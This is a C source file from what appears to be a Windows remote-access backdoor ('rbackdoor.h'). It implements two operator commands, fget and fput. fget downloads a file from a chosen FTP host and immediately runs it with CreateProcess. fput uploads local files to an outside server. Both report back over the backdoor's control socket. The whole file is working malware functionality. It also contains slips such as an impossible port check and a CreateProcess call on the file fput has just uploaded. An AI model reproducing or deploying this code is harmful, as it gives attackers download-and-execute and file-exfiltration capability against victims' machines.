#include "rbackdoor.h"

/************************************************************************/
/*  FGET & FPUT Functions                                               */
/*  - FGET : Get a file on a ftp server                                 */
/*  - FPUT : Put a file on a ftp server                                 */
/************************************************************************/

/************************************************************************/
/*  FGET                                                                */
/************************************************************************/

int fget(char *host, int port, char *user, char *password, char *rfile, char *lfile)
{
	HINTERNET hInternet, hServer;
	STARTUPINFO startup_info;
	char *buffer;
	int i;
	
	if(strlen(host) < 3 || port == 0 && port > 65535 || strlen(user) < 1 || strlen(password) < 1 || strlen(rfile) < 1 || strlen(lfile) < 1)
	{
	    Proc_help("fget");
		return(-1);
	}
	
	i = strlen(host) + strlen(user) + strlen(password) + strlen(rfile) + strlen(lfile) + 5;
	buffer = (char *)GlobalAlloc(GPTR, i+101);
	sprintf(buffer, "Server : %s\nPort : %d\nUser : %s\nPassword : %s\nFile To Get : %s\nLocal Destination : %s\n", host, port, user, password, rfile, lfile);
	rsend(ConnectSocket, buffer);
	GlobalFree(buffer);
	
	hInternet = InternetOpen(NULL, INTERNET_OPEN_TYPE_DIRECT, NULL, NULL, 0);
	hServer = InternetConnect(hInternet, host, (unsigned short)port, user, password, INTERNET_SERVICE_FTP, 0, 0);
	if(hServer == NULL) {
		rsend(ConnectSocket, "Connection failed\n");
		return(-1);
	}
	else rsend(ConnectSocket, "Connection etablished.\n");
	rsend(ConnectSocket, "Now, get the file, please wait...\n");
	if(FtpGetFile(hServer, rfile, lfile, 0, FILE_ATTRIBUTE_NORMAL, FTP_TRANSFER_TYPE_BINARY, 0) ==0) {
		rsend(ConnectSocket, "File not transfered, probably not present.\n");
		return(-1);
	} 
	
	GetStartupInfo(&startup_info);
	CreateProcess(NULL, lfile, NULL, NULL, 0, 0, NULL, NULL, &startup_info, (PROCESS_INFORMATION *)&startup_info);
	
	rsend(ConnectSocket, "File as been receive.\n");
	InternetCloseHandle(hServer);
	InternetCloseHandle(hInternet);
	
	return(0);
}
/************************************************************************/
/*  FPUT                                                                */
/************************************************************************/

int fput(char *host, int port, char *user, char *password, char *lfile, char *rfile)
{
	HINTERNET hInternet, hServer;
	STARTUPINFO startup_info;
	char *buffer;
	int i;
	
	if(strlen(host) < 3 || port == 0 && port > 65535 || strlen(user) < 1 || strlen(password) < 1 || strlen(rfile) < 1 || strlen(lfile) < 1)
	{
		Proc_help("fput");
		return(-1);
	}
	
	i = strlen(host) + strlen(user) + strlen(password) + strlen(lfile) + strlen(rfile) + 5;
	buffer = (char *)GlobalAlloc(GPTR, i+101);
	sprintf(buffer, "Server : %s\nPort : %d\nUser : %s\nPassword : %s\nFile To Put : %s\nRemote File Destination : %s\n", host, port, user, password, lfile, rfile);
	rsend(ConnectSocket, buffer);
	GlobalFree(buffer);
	
	hInternet = InternetOpen(NULL, INTERNET_OPEN_TYPE_DIRECT, NULL, NULL, 0);
	hServer = InternetConnect(hInternet, host, (unsigned short)port, user, password, INTERNET_SERVICE_FTP, 0, 0);
	if(hServer == NULL) {
		rsend(ConnectSocket, "Connection failed\n");
		return(-1);
	} else rsend(ConnectSocket, "Connection etablished.\n");

	rsend(ConnectSocket, "Now, put the file, please wait...\n");
	if(FtpPutFile(hServer, lfile, rfile, FTP_TRANSFER_TYPE_BINARY, 0) == 0) {
		rsend(ConnectSocket, "File not sent, probably not present.\n");
		return(-1);
	}
	
	GetStartupInfo(&startup_info);
	CreateProcess(NULL, lfile, NULL, NULL, 0, 0, NULL, NULL, &startup_info, (PROCESS_INFORMATION *)&startup_info);
	
	rsend(ConnectSocket, "File as been sent.\n");
	InternetCloseHandle(hServer);
	InternetCloseHandle(hInternet);
	
	return(0);
}

